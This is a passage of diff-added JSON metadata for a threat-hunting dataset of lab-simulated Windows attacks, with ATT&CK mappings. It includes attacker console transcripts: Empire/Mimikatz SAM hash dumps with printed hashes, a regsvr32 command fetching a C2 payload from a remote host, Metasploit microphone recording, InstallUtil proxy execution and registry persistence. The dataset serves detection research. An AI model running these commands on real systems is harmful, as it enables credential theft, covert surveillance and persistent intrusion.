+            "adversary_view": "(Empire: WE8XYD3K) > agents\n\n[*] Active agents:\n\nName     La Internal IP     Machine Name      Username                Process            PID    Delay    Last Seen            Listener\n----     -- -----------     ------------      --------                -------            ---    -----    ---------            ----------------\nWE8XYD3K ps 172.18.39.5     WORKSTATION5      *THESHIRE\\pgustavo      powershell         5972   5/0.0    2020-09-22 07:44:38  http            \n\n(Empire: agents) > interact WE8XYD3K\n(Empire: WE8XYD3K) > usemodule situational_awareness/network/powerview/get_session\n(Empire: powershell/situational_awareness/network/powerview/get_session) > info\n\n              Name: Get-NetSession\n            Module: powershell/situational_awareness/network/powerview/get_session\n        NeedsAdmin: False\n        OpsecSafe: True\n          Language: powershell\nMinLanguageVersion: 2\n        Background: True\n  OutputExtension: None\n\nAuthors:\n  @harmj0y\n\nDescription:\n  Execute the NetSessionEnum Win32API call to query a given\n  host for active sessions on the host. Part of PowerView.\n\nComments:\n  https://github.com/PowerShellMafia/PowerSploit/blob/dev/Reco\n  n/\n\nOptions:\n\n  Name         Required    Value                     Description\n  ----         --------    -------                   -----------\n  Agent        True        WE8XYD3K                  Agent to run module on.                 \n  ComputerName False       localhost                 The hostname or IP to query for local   \n                                                    group users.                            \n\n(Empire: powershell/situational_awareness/network/powerview/get_session) > set ComputerName MORDORDC\n(Empire: powershell/situational_awareness/network/powerview/get_session) > execute\n[*] Tasked WE8XYD3K to run TASK_CMD_JOB\n[*] Agent WE8XYD3K tasked with task ID 2\n[*] Tasked agent WE8XYD3K to run module powershell/situational_awareness/network/powerview/get_session\n(Empire: powershell/situational_awareness/network/powerview/get_session) > \nJob started: DV248X\n\nCName         UserName Time IdleTime ComputerName\n-----         -------- ---- -------- ------------\n\\\\172.18.39.5 pgustavo    0        0 MORDORDC    \n\nGet-NetSession completed!\n\n(Empire: powershell/situational_awareness/network/powerview/get_session) > "
+        },
+        "references": null,
+        "mp_last_updated": "2022-01-08T01:49:33.819297+00:00"
+    },
+    "datasets/atomic/_metadata/SDWIN-190625103712.yaml": {
+        "title": "Empire Mimikatz SAM Extract Hashes",
+        "id": "SDWIN-190625103712",
+        "contributors": [
+            "Roberto Rodriguez @Cyb3rWard0g"
+        ],
+        "creation_date": "2019/06/25",
+        "modification_date": "2019/09/22",
+        "platform": [
+            "Windows"
+        ],
+        "type": "atomic",
+        "tags": [
+            "Calculating SysKey",
+            "SAM Read",
+            "SAM Handle Request"
+        ],
+        "description": "This dataset represents adversaries calculating the SysKey to decrypt Security Account Mannager (SAM) database entries (from registry or hive) and get NTLM, and sometimes LM hashes of local accounts password.",
+        "attack_mappings": [
+            {
+                "technique": "T1003",
+                "sub-technique": "002",
+                "tactics": [
+                    "TA0006"
+                ]
+            }
+        ],
+        "notebooks": null,
+        "files": [
+            {
+                "type": "Host",
+                "link": "https://raw.githubusercontent.com/OTRF/Security-Datasets/master/datasets/atomic/windows/credential_access/host/empire_mimikatz_sam_access.zip"
+            }
+        ],
+        "simulation": {
+            "environment": "Mordor shire",
+            "tools": [
+                {
+                    "type": "C2",
+                    "name": "Empire",
+                    "module": "mimikatz_sam",
+                    "script": "https://github.com/OTRF/Blacksmith/blob/master/aws/Security-Datasets/cfn-files/scripts/Invoke-Mimikatz.ps1"
+                }
+            ],
+            "permissions_required": [
+                "Administrator"
+            ],
+            "adversary_view": "(Empire: WE8XYD3K) > agents\n\n[*] Active agents:\n\nName     La Internal IP     Machine Name      Username                Process            PID    Delay    Last Seen            Listener\n----     -- -----------     ------------      --------                -------            ---    -----    ---------            ----------------\nWE8XYD3K ps 172.18.39.5     WORKSTATION5      *THESHIRE\\pgustavo      powershell         5972   5/0.0    2020-09-22 08:05:18  http            \n\n(Empire: agents) > interact WE8XYD3K\n(Empire: WE8XYD3K) > usemodule credentials/mimikatz/sam*\n(Empire: powershell/credentials/mimikatz/sam) > info\n\n              Name: Invoke-Mimikatz SAM dump\n            Module: powershell/credentials/mimikatz/sam\n        NeedsAdmin: True\n        OpsecSafe: True\n          Language: powershell\nMinLanguageVersion: 2\n        Background: True\n  OutputExtension: None\n\nAuthors:\n  @JosephBialek\n  @gentilkiwi\n\nDescription:\n  Runs PowerSploit's Invoke-Mimikatz function to extract\n  hashes from the Security Account Managers (SAM) database.\n\nComments:\n  http://clymb3r.wordpress.com/ http://blog.gentilkiwi.com htt\n  ps://github.com/gentilkiwi/mimikatz/wiki/module-~-lsadump#ls\n  a\n\nOptions:\n\n  Name  Required    Value                     Description\n  ----  --------    -------                   -----------\n  Agent True        WE8XYD3K                  Agent to run module on.                 \n\n(Empire: powershell/credentials/mimikatz/sam) > execute\n[*] Tasked WE8XYD3K to run TASK_CMD_JOB\n[*] Agent WE8XYD3K tasked with task ID 3\n[*] Tasked agent WE8XYD3K to run module powershell/credentials/mimikatz/sam\n(Empire: powershell/credentials/mimikatz/sam) > \nJob started: Z4KLXY\n\nHostname: WORKSTATION5.theshire.local / S-1-5-21-4228717743-1032521047-1810997296\n\n  .#####.   mimikatz 2.2.0 (x64) #19041 Aug 10 2020 20:07:46\n.## ^ ##.  \"A La Vie, A L'Amour\" - (oe.eo)\n## / \\ ##  /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )\n## \\ / ##       > http://blog.gentilkiwi.com/mimikatz\n'## v ##'       Vincent LE TOUX             ( vincent.letoux@gmail.com )\n  '#####'        > http://pingcastle.com / http://mysmartlogon.com   ***/\n\nmimikatz(powershell) # token::elevate\nToken Id  : 0\nUser name : \nSID name  : NT AUTHORITY\\SYSTEM\n\n696     {0;000003e7} 1 D 27257          NT AUTHORITY\\SYSTEM     S-1-5-18        (04g,21p)       Primary\n-> Impersonated !\n* Process Token : {0;0010a7df} 2 F 10859624    THESHIRE\\pgustavo       S-1-5-21-4228717743-1032521047-1810997296-1104  (17g,24p)       Primary\n* Thread Token  : {0;000003e7} 1 D 12272014    NT AUTHORITY\\SYSTEM     S-1-5-18        (04g,21p)       Impersonation (Delegation)\n\nmimikatz(powershell) # lsadump::sam\nDomain : WORKSTATION5\nSysKey : 8e84403d1d0dcb7cac8f92c438143741\nLocal SID : S-1-5-21-2579707521-1384412784-3942915809\n\nSAMKey : 506df337a2681cb7e4c265d30250d55d\n\nRID  : 000001f4 (500)\nUser : wardog\n  Hash NTLM: 42ddb2963bbe8f1c075fc869d3bce33e\n\nSupplemental Credentials:\n* Primary:NTLM-Strong-NTOWF *\n    Random Value : 85c5e007a00c6fb1c5adf026cf9dd42f\n\n* Primary:Kerberos-Newer-Keys *\n    Default Salt : WORKSTATION5Administrator\n    Default Iterations : 4096\n    Credentials\n      aes256_hmac       (4096) : d24867d975ac3fead7e604bc793bc32c42e4f599d0fd871cebca72444a9475a8\n      aes128_hmac       (4096) : d22a564882d258731c02684449a62b3c\n      des_cbc_md5       (4096) : ae58aed5d5cef143\n    OldCredentials\n      aes256_hmac       (4096) : e104dc2412faf5a1e65d1c10218130aa1d2d70d64bd103e36c6115d9f84c36c9\n      aes128_hmac       (4096) : eff1bddad41de0a68408261d362d1ad3\n      des_cbc_md5       (4096) : 15a8dc46a16e62bf\n\n* Packages *\n    NTLM-Strong-NTOWF\n\n* Primary:Kerberos *\n    Default Salt : WORKSTATION5Administrator\n    Credentials\n      des_cbc_md5       : ae58aed5d5cef143\n    OldCredentials\n      des_cbc_md5       : 15a8dc46a16e62bf\n\nRID  : 000001f5 (501)\nUser : Guest\n\nRID  : 000001f7 (503)\nUser : DefaultAccount\n\nmimikatz(powershell) # token::revert\n* Process Token : {0;0010a7df} 2 F 10859624    THESHIRE\\pgustavo       S-1-5-21-4228717743-1032521047-1810997296-1104  (17g,24p)       Primary\n* Thread Token  : no token\n\n(Empire: powershell/credentials/mimikatz/sam) >"
+        },
+        "references": null,
+        "mp_last_updated": "2022-01-08T01:49:34.009296+00:00"
+    },
+    "datasets/atomic/_metadata/SDWIN-190625133822.yaml": {
+        "title": "Empire Reg Dump SAM Hive",
+        "id": "SDWIN-190625133822",
+        "contributors": [
+            "Roberto Rodriguez @Cyb3rWard0g"
+        ],
+        "creation_date": "2019/06/25",
+        "modification_date": "2019/06/25",
+        "platform": [
+            "Windows"
+        ],
+        "type": "atomic",
+        "tags": [
+            "SAM Rquest Handle"
+        ],
+        "description": "This dataset represents adversaries with administrator privileges using the windows reg utility to dump the SAM registry hive.",
+        "attack_mappings": [
+            {
+                "technique": "T1003",
+                "sub-technique": "002",
+                "tactics": [
+                    "TA0006"
+                ]
+            }
+        ],
+        "notebooks": null,
+        "files": [
+            {
+                "type": "Host",
+                "link": "https://raw.githubusercontent.com/OTRF/Security-Datasets/master/datasets/atomic/windows/credential_access/host/empire_shell_reg_dump_sam.zip"
+            }
+        ],
+        "simulation": {
+            "environment": "Mordor shire",
+            "tools": [
+                {
+                    "type": "Interactive Session",
+                    "name": "Remote Desktop Protocol",
+                    "module": null,
+                    "script": null
+                }
+            ],
+            "permissions_required": [
+                "Administrator"
+            ],
+            "adversary_view": "(Empire: WE8XYD3K) > agents\n\n[*] Active agents:\n\nName     La Internal IP     Machine Name      Username                Process            PID    Delay    Last Seen            Listener\n----     -- -----------     ------------      --------                -------            ---    -----    ---------            ----------------\nWE8XYD3K ps 172.18.39.5     WORKSTATION5      *THESHIRE\\pgustavo      powershell         5972   5/0.0    2020-09-22 08:27:49  http            \n\n(Empire: agents) > interact WE8XYD3K\n(Empire: WE8XYD3K) > shell reg save HKLM\\sam sam\n[*] Tasked WE8XYD3K to run TASK_SHELL\n[*] Agent WE8XYD3K tasked with task ID 5\n(Empire: WE8XYD3K) > \nThe operation completed successfully.\n\n..Command execution completed.\n\n(Empire: WE8XYD3K) >"
+        },
+        "references": null,
+        "mp_last_updated": "2022-01-08T01:49:34.188296+00:00"
+    },
+    "datasets/atomic/_metadata/SDWIN-191027055035.yaml": {
+        "title": "RDP TaskManager LSASS Dump",
+        "id": "SDWIN-191027055035",
+        "contributors": [
+            "Roberto Rodriguez @Cyb3rWard0g"
+        ],
+        "creation_date": "2019/10/27",
+        "modification_date": "2020/09/21",
+        "platform": [
+            "Windows"
+        ],
+        "type": "atomic",
+        "tags": [
+            "RDP Interactive"
+        ],
+        "description": "This dataset represents adversaries using RDP and task manager interactively and dump the memory space of lsass.",
+        "attack_mappings": [
+            {
+                "technique": "T1003",
+                "sub-technique": "001",
+                "tactics": [
+                    "TA0006"
+                ]
+            }
+        ],
+        "notebooks": [
+            {
+                "project": "Threat Hunter Playbook",
+                "name": "Remote Interactive Task Manager LSASS Dump",
+                "link": "https://threathunterplaybook.com/notebooks/windows/06_credential_access/WIN-191030201010.html"
+            }
+        ],
+        "files": [
+            {
+                "type": "Host",
+                "link": "https://raw.githubusercontent.com/OTRF/Security-Datasets/master/datasets/atomic/windows/credential_access/host/rdp_interactive_taskmanager_lsass_dump.zip"
+            }
+        ],
+        "simulation": {
+            "environment": "Mordor shire",
+            "tools": [
+                {
+                    "type": "Interactive Session",
+                    "name": "RDP",
+                    "module": null,
+                    "script": null
+                }
+            ],
+            "permissions_required": [
+                "Administrator"
+            ],
+            "adversary_view": "RDP to victim\nOpen Windows Task Manager as Administrator\nSelect lsass.exe\nRight-click on lsass.exe and select \u201cCreate dump file\u201d"
+        },
+        "references": null,
+        "mp_last_updated": "2022-01-08T01:49:34.383296+00:00"
+    },
+    "datasets/atomic/_metadata/SDWIN-191027223020.yaml": {
+        "title": "Covenant ShellCmd InstallUtil",
+        "id": "SDWIN-191027223020",
+        "contributors": [
+            "Roberto Rodriguez @Cyb3rWard0g"
+        ],
+        "creation_date": "2019/10/27",
+        "modification_date": "2020/09/19",
+        "platform": [
+            "Windows"
+        ],
+        "type": "atomic",
+        "tags": [
+            "InstallUtil",
+            "LOLBin"
+        ],
+        "description": "This dataset represents adversaries proxy executing code through InstallUtil, a trusted Windows utility.",
+        "attack_mappings": [
+            {
+                "technique": "T1218",
+                "sub-technique": "004",
+                "tactics": [
+                    "TA0005",
+                    "TA0002"
+                ]
+            }
+        ],
+        "notebooks": null,
+        "files": [
+            {
+                "type": "Host",
+                "link": "https://raw.githubusercontent.com/OTRF/Security-Datasets/master/datasets/atomic/windows/defense_evasion/host/covenant_installutil.zip"
+            }
+        ],
+        "simulation": {
+            "environment": "Mordor shire",
+            "tools": [
+                {
+                    "type": "C2",
+                    "name": "Covenant",
+                    "module": "ShellCmd",
+                    "script": "https://github.com/cobbr/Covenant/blob/7555b19ffb9401c0e37094c25e404a640b1688d7/Covenant/Data/Tasks/SharpSploit.Execution.yaml#L96"
+                }
+            ],
+            "permissions_required": [
+                "User"
+            ],
+            "adversary_view": "Upload Task: GruntHTTP.dll -> C:\\ProgramData\\GruntHTTP.dll\n(wardog) > ShellCmd /shellcommand:\"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\InstallUtil.exe /logfile= /LogToConsole=false /u c:\\ProgramData\\GruntHTTP.dll\""
+        },
+        "references": null,
+        "mp_last_updated": "2022-01-08T01:49:34.558296+00:00"
+    },
+    "datasets/atomic/_metadata/SDWIN-191225045202.yaml": {
+        "title": "Empire Invoke InternalMonologue",
+        "id": "SDWIN-191225045202",
+        "contributors": [
+            "Roberto Rodriguez @Cyb3rWard0g"
+        ],
+        "creation_date": "2019/12/25",
+        "modification_date": "2020/09/21",
+        "platform": [
+            "Windows"
+        ],
+        "type": "atomic",
+        "tags": [
+            "Registry Modification",
+            "Windows Registry NetNTLM settings",
+            "Downgrade"
+        ],
+        "description": "This dataset represents adversaries downgrading the challenge/response authentication protocol used for network logons, the minimum security negotiated for applications using NTLMSSP, and security settings that restrict outgoing NTLM traffic to remote servers in an environment",
+        "attack_mappings": [
+            {
+                "technique": "T1112",
+                "sub-technique": null,
+                "tactics": [
+                    "TA0005"
+                ]
+            }
+        ],
+        "notebooks": [
+            {
+                "project": "Threat Hunter Playbook",
+                "name": "Extended NetNTLM Downgrade",
+                "link": "https://threathunterplaybook.com/notebooks/windows/05_defense_evasion/WIN-191224222300.html"
+            }
+        ],
+        "files": [
+            {
+                "type": "Host",
+                "link": "https://raw.githubusercontent.com/OTRF/Security-Datasets/master/datasets/atomic/windows/defense_evasion/host/empire_monologue_netntlm_downgrade.zip"
+            }
+        ],
+        "simulation": {
+            "environment": "Mordor shire",
+            "tools": [
+                {
+                    "type": "C2",
+                    "name": "Empire",
+                    "module": "invoke_internal_monologue",
+                    "script": "https://github.com/BC-SECURITY/Empire/blob/master/data/module_source/credentials/Invoke-InternalMonologue.ps1"
+                }
+            ],
+            "permissions_required": [
+                "Administrator"
+            ],
+            "adversary_view": "(Empire: XFLEZM9N) > usemodule credentials/invoke_internal_monologue*\n(Empire: powershell/credentials/invoke_internal_monologue) > info\n\n            Name: Invoke-InternalMonologue\n            Module: powershell/credentials/invoke_internal_monologue\n        NeedsAdmin: True\n        OpsecSafe: False\n        Language: powershell\nMinLanguageVersion: 2\n        Background: False\nOutputExtension: None\n\nAuthors:\n@eladshamir\n@4lex\n\nDescription:\nUses the Internal Monologue attack to force easily-\ndecryptable Net-NTLMv1 responses over localhost and without\ndirectly touching LSASS.\nhttps://github.com/eladshamir/Internal-Monologue\n\nComments:\nThe underlying powershell function accepts switches that\n[DISABLE] default behaviours. The default settings will\ndowngrade NetNTLM responses to v1, impersonate all users,\nuse challenge 1122334455667788 and restore the registry to\nits original state. Set the options in this module to True\nin order to DISABLE the behaviours Disabling Downgrade and\nImpersonation yields higher OPSEC, but less than ideal loot\n\nOptions:\n\nName        Required    Value                     Description\n----        --------    -------                   -----------\nAgent       True        XFLEZM9N                  Agent to use for InternalMonologue      \nChallenge   True        1122334455667788          Net-NTLM Challenge to send              \nDowngrade   False                                 DISABLE downgrading to allow Net-NTLMv1 \n                                                    responses                               \nImpersonate False                                 DISABLE user impersonation and fetch    \n                                                    only current user                       \nRestore     False                                 DISABLE restoring the registry setting  \n                                                    that allowed v1 responses               \nVerbose     False                                 Verbose                                 \n\n(Empire: powershell/credentials/invoke_internal_monologue) > execute\n[>] Module is not opsec safe, run? [y/N] y\n[*] Tasked XFLEZM9N to run TASK_CMD_WAIT\n[*] Agent XFLEZM9N tasked with task ID 2\n[*] Tasked agent XFLEZM9N to run module powershell/credentials/invoke_internal_monologue\n(Empire: powershell/credentials/invoke_internal_monologue) > pgustavo::shire:6c5a5d82ec8bf7d84989d0876cdfe1b57a0019b72517ca9f:6c5a5d82ec8bf7d84989d0876cdfe1b57a0019b72517ca9f:1122334455667788\nIT001$::shire:cf1dd7f62b7394958df43c8bbdff4888495a7e572a359017:cf1dd7f62b7394958df43c8bbdff4888495a7e572a359017:1122334455667788"
+        },
+        "references": null,
+        "mp_last_updated": "2022-01-08T01:49:34.740296+00:00"
+    },
+    "datasets/atomic/_metadata/SDWIN-200609225055.yaml": {
+        "title": "MSF Record Mic",
+        "id": "SDWIN-200609225055",
+        "contributors": [
+            "Roberto Rodriguez @Cyb3rWard0g"
+        ],
+        "creation_date": "2020/06/09",
+        "modification_date": "2020/06/09",
+        "platform": [
+            "Windows"
+        ],
+        "type": "atomic",
+        "tags": [
+            "Microphone Access"
+        ],
+        "description": "This dataset represents adversaries accessing the microphone of an endpoint.",
+        "attack_mappings": [
+            {
+                "technique": "T1123",
+                "sub-technique": null,
+                "tactics": [
+                    "TA0009"
+                ]
+            }
+        ],
+        "notebooks": [
+            {
+                "project": "Threat Hunter Playbook",
+                "name": "Processes Accessing the Microphone Device",
+                "link": "https://threathunterplaybook.com/notebooks/windows/09_collection/WIN-200609225055.html"
+            }
+        ],
+        "files": [
+            {
+                "type": "Host",
+                "link": "https://raw.githubusercontent.com/OTRF/Security-Datasets/master/datasets/atomic/windows/collection/host/msf_record_mic.zip"
+            }
+        ],
+        "simulation": {
+            "environment": "Mordor shire",
+            "tools": [
+                {
+                    "type": "C2",
+                    "name": "Metasploit",
+                    "module": "post",
+                    "script": "https://github.com/pwnieexpress/metasploit-framework/blob/master/modules/post/multi/manage/record_mic.rb"
+                }
+            ],
+            "permissions_required": [
+                "User"
+            ],
+            "adversary_view": "msf5 exploit(multi/handler) > use post/multi/manage/record_mic\nmsf5 post(multi/manage/record_mic) > set SESSION 2\nSESSION => 2\nmsf5 post(multi/manage/record_mic) > info\n\n      Name: Multi Manage Record Microphone\n    Module: post/multi/manage/record_mic\n  Platform: Linux, OSX, Windows\n      Arch: \n      Rank: Normal\n\nProvided by:\n  sinn3r <sinn3r@metasploit.com>\n\nCompatible session types:\n  Meterpreter\n\nBasic options:\n  Name      Current Setting  Required  Description\n  ----      ---------------  --------  -----------\n  DURATION  5                no        Number of seconds to record\n  SESSION   2                yes       The session to run this module on.\n\nDescription:\n  This module will enable and record your target's microphone. For \n  non-Windows targets, please use Java meterpreter to be able to use \n  this feature.\n\nmsf5 post(multi/manage/record_mic) > run\n\n[*] 172.18.39.6 - 20%...\n[*] 172.18.39.6 - 40%...\n[*] 172.18.39.6 - 60%...\n[*] 172.18.39.6 - 80%...\n[*] 172.18.39.6 - 100%...\n[*] 172.18.39.6 - Audio size: (55169 bytes)\n[+] 172.18.39.6 - Audio recording saved: /home/msf/.msf4/loot/20200610025201_default_172.18.39.6_172.18.39.6.audi_358712.wav\n[*] Post module execution completed\nmsf5 post(multi/manage/record_mic) >"
+        },
+        "references": null,
+        "mp_last_updated": "2022-01-08T01:49:34.918563+00:00"
+    },
+    "datasets/atomic/_metadata/SDWIN-200721232741.yaml": {
+        "title": "Empire Regsvr32 Execution",
+        "id": "SDWIN-200721232741",
+        "contributors": [
+            "Roberto Rodriguez @Cyb3rWard0g"
+        ],
+        "creation_date": "2020/07/21",
+        "modification_date": "2020/07/21",
+        "platform": [
+            "Windows"
+        ],
+        "type": "atomic",
+        "tags": [
+            "Regsvr32 Execution"
+        ],
+        "description": "This dataset represents threat actors leveraging regsvr32 to proxy the execution of an empire payload (.sct file) to create a reverse connection to the C2.",
+        "attack_mappings": [
+            {
+                "technique": "T1218",
+                "sub-technique": "010",
+                "tactics": [
+                    "TA0005"
+                ]
+            }
+        ],
+        "notebooks": null,
+        "files": [
+            {
+                "type": "Host",
+                "link": "https://raw.githubusercontent.com/OTRF/Security-Datasets/master/datasets/atomic/windows/defense_evasion/host/empire_launcher_sct_regsvr32.zip"
+            }
+        ],
+        "simulation": {
+            "environment": "Mordor shire",
+            "tools": [
+                {
+                    "type": "C2",
+                    "name": "Empire",
+                    "module": "launcher",
+                    "script": "https://github.com/BC-SECURITY/Empire/blob/master/lib/stagers/windows/launcher_sct.py"
+                }
+            ],
+            "permissions_required": [
+                "Administrator"
+            ],
+            "adversary_view": "Threat Actor View:\n(Empire) > usestager windows/launcher_sct\n(Empire: stager/windows/launcher_sct) > info\n\nName: regsvr32\n\nDescription:\n  Generates an sct file (COM Scriptlet) Host this\n  anywhere\n\nOptions:\n\n  Name             Required    Value             Description\n  ----             --------    -------           -----------\n  Listener         True                          Listener to generate stager for.\n  Language         True        powershell        Language of the stager to generate.\n  StagerRetries    False       0                 Times for the stager to retry\n                                                connecting.\n  Base64           True        True              Switch. Base64 encode the output.\n  Obfuscate        False       False             Switch. Obfuscate the launcher\n                                                powershell code, uses the\n                                                ObfuscateCommand for obfuscation types.\n                                                For powershell only.\n  ObfuscateCommand False       Token\\All\\1       The Invoke-Obfuscation command to use.\n                                                Only used if Obfuscate switch is True.\n                                                For powershell only.\n  OutFile          False       /tmp/launcher.sct File to output SCT to, otherwise\n                                                displayed on the screen.\n  UserAgent        False       default           User-agent string to use for the staging\n                                                request (default, none, or other).\n  Proxy            False       default           Proxy to use for request (default, none,\n                                                or other).\n  ProxyCreds       False       default           Proxy credentials\n                                                ([domain\\]username:password) to use for\n                                                request (default, none, or other).\n\n\n(Empire: stager/windows/launcher_sct) > set Listener http\n(Empire: stager/windows/launcher_sct) > execute\n\n[*] Stager output written out to: /tmp/launcher.sct\n\nVictim's PC\n\nPS C:\\Windows\\System32> .\\regsvr32.exe /s /n /u /i:http://10.10.10.5:8444/launcher.sct scrobj.dll\n\nThreat Actor View:\n\n(Empire: stager/windows/launcher_sct) > back\n(Empire) > \nEmpire: agents) > \n[*] Sending POWERSHELL stager (stage 1) to 172.18.39.5\n[*] New agent 712ETU3B checked in\n[+] Initial agent 712ETU3B from 172.18.39.5 now active (Slack)\n[*] Sending agent (stage 2) to 712ETU3B at 172.18.39.5\n\n(Empire: agents) > \n(Empire: agents) > \n(Empire: agents) > agents\n\n[*] Active agents:\n\nName     La Internal IP     Machine Name      Username                Process            PID    Delay    Last Seen            Listener\n----     -- -----------     ------------      --------                -------            ---    -----    ---------            ----------------\n712ETU3B ps 172.18.39.5     WORKSTATION5      *MORDOR\\pgustavo        powershell         9076   5/0.0    2020-07-22 03:29:27  http            \n\n(Empire: agents) >"
+        },
+        "references": null,
+        "mp_last_updated": "2022-01-08T01:49:35.105565+00:00"
+    },
+    "datasets/atomic/_metadata/SDWIN-200722001847.yaml": {
+        "title": "Empire Elevated Registry Run Keys",
+        "id": "SDWIN-200722001847",
+        "contributors": [
+            "Roberto Rodriguez @Cyb3rWard0g"
+        ],
+        "creation_date": "2020/07/22",
+        "modification_date": "2020/09/04",
+        "platform": [
+            "Windows"
+        ],
+        "type": "atomic",
+        "tags": [
+            "Local Registry Modification",
+            "Registry Run Keys"
+        ],
+        "description": "This dataset represents adversaries modifying local Run registry keys (i.e. HKLM:SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run) for persistence. It also captures the execution of the persistence mechanism.",
+        "attack_mappings": [
+            {
+                "technique": "T1547",
+                "sub-technique": "001",
+                "tactics": [
+                    "TA0003"
+                ]
+            }
+        ],
+        "notebooks": null,
+        "files": [
+            {
+                "type": "Host",
+                "link": "https://raw.githubusercontent.com/OTRF/Security-Datasets/master/datasets/atomic/windows/persistence/host/empire_persistence_registry_modification_run_keys_elevated_user.zip"
+            }
+        ],
+        "simulation": {
+            "environment": "Mordor shire",
+            "tools": [
+                {
+                    "type": "C2",
+                    "name": "Empire",
+                    "module": "elevated_registry",
+                    "script": "https://github.com/EmpireProject/Empire/blob/dev/data/module_source/persistence/Persistence.psm1"
+                }
+            ],
+            "permissions_required": [
+                "Administrator"
+            ],
+            "adversary_view": "(Empire: 712ETU3B) > agents\n[*] Active agents:\n\nName     La Internal IP     Machine Name      Username                Process            PID    Delay    Last Seen            Listener\n----     -- -----------     ------------      --------                -------            ---    -----    ---------            ----------------\n712ETU3B ps 172.18.39.5     WORKSTATION5      *MORDOR\\pgustavo        powershell         9076   5/0.0    2020-07-22 04:06:31  http            \n\n(Empire: agents) > \n(Empire: agents) > interact 712ETU3B\n(Empire: 712ETU3B) > \n(Empire: 712ETU3B) > usemodule persistence/elevated/registry*\n\n(Empire: 712ETU3B) > usemodule persistence/elevated/registry*\n(Empire: powershell/persistence/elevated/registry) > info\n\n              Name: Invoke-Registry\n            Module: powershell/persistence/elevated/registry\n        NeedsAdmin: True\n        OpsecSafe: False\n          Language: powershell\nMinLanguageVersion: 2\n        Background: False\n  OutputExtension: None\n\nAuthors:\n  @mattifestation\n  @harmj0y\n\nDescription:\n  Persist a stager (or script) via the\n  HKLM:SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run registry\n  key. This has an easy detection/removal rating.\n\nComments:\n  https://github.com/mattifestation/PowerSploit/blob/master/Pe\n  rsistence/Persistence.psm1\n\nOptions:\n\n  Name             Required    Value                     Description\n  ----             --------    -------                   -----------\n  Agent            True        712ETU3B                  Agent to run module on.                 \n  Listener         False                                 Listener to use.                        \n  Obfuscate        False       False                     Switch. Obfuscate the launcher          \n                                                        powershell code, uses the               \n                                                        ObfuscateCommand for obfuscation types. \n                                                        For powershell only.                    \n  ObfuscateCommand False       Token\\All\\1               The Invoke-Obfuscation command to use.  \n                                                        Only used if Obfuscate switch is True.  \n                                                        For powershell only.                    \n  AMSIBypass       False       True                      Include mattifestation's AMSI Bypass in \n                                                        the stager code.                        \n  AMSIBypass2      False       False                     Include Tal Liberman's AMSI Bypass in   \n                                                        the stager code.                        \n  KeyName          True        Updater                   Key name for the run trigger.           \n  RegPath          False       HKLM:SOFTWARE\\Microsoft\\  Registry location to store the script   \n                              Windows\\CurrentVersion\\D  code. Last element is the key name.     \n                              ebug                    \n  ADSPath          False                                 Alternate-data-stream location to store \n                                                        the script code.                        \n  ExtFile          False                                 Use an external file for the payload    \n                                                        instead of a stager.                    \n  Cleanup          False                                 Switch. Cleanup the trigger and any     \n                                                        script from specified location.         \n  UserAgent        False       default                   User-agent string to use for the staging\n                                                        request (default, none, or other).      \n  Proxy            False       default                   Proxy to use for request (default, none,\n                                                        or other).                              \n  ProxyCreds       False       default                   Proxy credentials                       \n                                                        ([domain\\]username:password) to use for \n                                                        request (default, none, or other).      \n\n(Empire: powershell/persistence/elevated/registry) > set Listener http\n(Empire: powershell/persistence/elevated/registry) > execute\n[>] Module is not opsec safe, run? [y/N] y\n[*] Tasked 712ETU3B to run TASK_CMD_WAIT\n[*] Agent 712ETU3B tasked with task ID 7\n[*] Tasked agent 712ETU3B to run module powershell/persistence/elevated/registry\n(Empire: powershell/persistence/elevated/registry) > \nRegistry persistence established using listener http stored in HKLM:SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Debug.\n\n(Empire: powershell/persistence/elevated/registry) >"
+        },
+        "references": null,
+        "mp_last_updated": "2022-01-08T01:49:35.276232+00:00"
+    },
+    "datasets/atomic/_metadata/SDWIN-200724174200.yaml": {
+        "title": "Covenant Remote WMI Eventing ActiveScriptEventConsumers",
+        "id": "SDWIN-200724174200",
+        "contributors": [
+            "Roberto Rodriguez @Cyb3rWard0g"
+        ],
+        "creation_date": "2020/07/24",
+        "modification_date": "2020/07/24",
+        "platform": [
+            "Windows"
+        ],
+        "type": "atomic",
+        "tags": [
+            "Remote WMI Eventing"
+        ],
+        "description": "This dataset represents adversaries using WMI event subscriptions (ActiveScriptEventConsumers) remotely to move laterally.",
+        "attack_mappings": [
+            {
+                "technique": "T1047",
+                "sub-technique": null,
+                "tactics": [
+                    "TA0002",
+                    "TA0008"
+                ]
+            }
+        ],
+        "notebooks": null,
+        "files": [
+            {
+                "type": "Host",
+                "link": "https://raw.githubusercontent.com/OTRF/Security-Datasets/master/datasets/atomic/windows/lateral_movement/host/covenant_wmi_remote_event_subscription_ActiveScriptEventConsumers.zip"
+            },
+            {
+                "type": "Network",
+                "link": "https://raw.githubusercontent.com/OTRF/Security-Datasets/master/datasets/atomic/windows/lateral_movement/network/covenant_wmi_remote_event_subscription_ActiveScriptEventConsumers.zip"
+            }
+        ],
+        "simulation": {
+            "environment": "Mordor shire",
+            "tools": [
+                {
+                    "type": "manual",
+                    "name": "shell",
+                    "module": "manual",
+                    "script": "https://3xpl01tc0d3r.blogspot.com/2020/02/gadgettojscript-covenant-donut.html"
+                }
+            ],
+            "permissions_required": [
+                "Administrator"
+            ],
+            "adversary_view": null
+        },
+        "references": [
+            "https://www.mdsec.co.uk/2020/09/i-like-to-move-it-windows-lateral-movement-part-1-wmi-event-subscription/"
+        ],
+        "mp_last_updated": "2022-01-08T01:49:35.496231+00:00"
+    },
+    "datasets/atomic/_metadata/SDWIN-200805020926.yaml": {
+        "title": "Covenant DCSync",
+        "id": "SDWIN-200805020926",
+        "contributors": [
+            "Roberto Rodriguez @Cyb3rWard0g"
+        ],
+        "creation_date": "2020/08/05",
+        "modification_date": "2020/09/20",
+        "platform": [
+            "Windows"
+        ],
+        "type": "atomic",
+        "tags": [
+            "AD Replication Services",
+            "RPC DRSUAPI DsGetNCChanges"
+        ],
+        "description": "This dataset represents adversaries abusing Active Directory Replication services to retrieve secret domain data (i.e. NTLM hashes) from domain accounts.",
+        "attack_mappings": [
+            {
+                "technique": "T1003",
+                "sub-technique": "006",
+                "tactics": [
+                    "TA0006"
+                ]
+            }
+        ],
+        "notebooks": null,
+        "files": [
+            {
